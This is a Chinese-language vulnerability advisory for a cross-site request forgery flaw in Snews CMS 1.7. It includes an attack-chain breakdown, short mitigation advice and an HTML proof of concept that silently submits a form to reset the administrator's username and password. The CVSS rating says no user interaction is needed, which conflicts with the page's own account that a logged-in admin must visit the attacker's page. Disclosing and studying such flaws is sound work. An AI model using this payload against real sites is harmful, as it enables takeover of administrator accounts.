CVE-2016-20051 CVSS 5.3 中危

CVE-2016-20051 Snews CMS跨站请求伪造漏洞

披露日期: 2026-04-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2016-20051

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Snews CMS

漏洞概述

Snews CMS 1.7版本存在跨站请求伪造（CSRF）安全漏洞。该漏洞源于应用程序未对修改管理员凭据的请求实施有效的CSRF防护机制。攻击者可制作包含恶意表单的网页，诱导已登录的管理员访问。当管理员访问时，浏览器将自动向服务器发送更改用户名和密码的请求，从而允许攻击者在无需认证的情况下劫持管理员账户。

技术细节

该漏洞的核心在于Snews CMS未能正确验证用户发起的敏感请求的来源合法性。在标准的Web应用交互中，修改管理员密码属于高风险操作，理应使用CSRF Token或严格验证Referer头来防止跨域伪造。然而，Snews CMS 1.7的`changeup`接口直接信任了携带有效Session Cookie的POST请求，未进行二次确认。攻击者利用这一缺陷，可构建恶意HTML页面，其中包含隐藏的表单，动作指向目标系统的修改接口，并预设了攻击者控制的新用户名和密码。通过社会工程学手段诱导管理员访问该页面后，浏览器会自动携带管理员的Cookie提交表单。服务器端因缺乏验证机制，无法区分这是管理员本人操作还是伪造请求，从而执行了密码修改逻辑，导致攻击者成功接管账户。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用的是存在漏洞的Snews CMS 1.7版本。

STEP 2

武器化

攻击者编写包含恶意HTML表单的代码，该表单预设了新的管理员凭据，并指向Snews的changeup接口。

STEP 3

交付

攻击者通过钓鱼邮件或其他方式，诱导已登录的管理员访问托管该恶意HTML页面的URL。

STEP 4

利用

管理员访问页面时，浏览器自动执行脚本，携带管理员的Session Cookie向服务器发送修改密码的POST请求。

STEP 5

达成

服务器验证Session有效后执行密码修改，攻击者随即可以使用新设定的凭据登录管理员后台。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2016-20051: Snews CMS CSRF -->
<!-- Attacker hosts this file and sends the link to the admin -->
<html>
<body>
  <h1>Please wait...</h1>
  <!-- The form targets the vulnerable changeup endpoint -->
  <form action="http://target-url/snews/" method="POST">
    <input type="hidden" name="task" value="changeup">
    <input type="hidden" name="uname" value="attacker">
    <input type="hidden" name="pass1" value="newpassword">
    <input type="hidden" name="pass2" value="newpassword">
  </form>
  <script>
    // Automatically submit the form upon page load
    document.forms[0].submit();
  </script>
</body>
</html>

影响范围

Snews CMS 1.7

防御指南

临时缓解措施

建议管理员暂时限制对后台管理地址的外网访问，仅允许通过VPN或受信任的内部网络访问。同时，加强管理员的安全意识，不要轻易点击来历不明的链接或访问非受信的网页。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表